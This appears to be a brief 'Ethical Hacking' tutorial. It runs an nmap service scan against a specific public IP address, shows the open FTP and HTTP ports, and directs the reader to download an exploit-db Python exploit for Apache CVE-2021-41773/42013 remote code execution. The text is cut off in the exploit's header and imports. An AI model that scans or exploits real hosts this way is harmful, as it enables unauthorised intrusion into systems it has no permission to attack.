Ethical Hacking
Visit the github project: https://github.com/samglish/ServerSide
Tools
- Skipfish
- Owasp Disrbuster
- Webslayer
- Nmap
- Nessus
The first scanner we will use
Nmap
to see the services running, launch nmap.
nmap -sV 145.14.145.161
output
Starting Nmap 7.91 ( https://nmap.org ) at 2024-07-04 22:50 WAT
Nmap scan report for 145.14.145.161
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
80/tcp open http awex
443/tcp open ssl/https awex
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
You can retrieve the services that are running or go directly to retrieve them from the database.
https://www.exploit-db.com/
Service:http
- Download the python file exploit
# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
# Date: 11/11/2021
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://apache.org/
# Version: Apache 2.4.49/2.4.50 (CGI enabled)
# Tested on: Debian GNU/Linux
# CVE : CVE-2021-41773 / CVE-2021-42013
# Credits : Lucas Schnell
#!/usr/bin/env python3
#coding: utf-8
import os
import re
import sys
import time
import requests
from colorama import Fore,Style
header = '''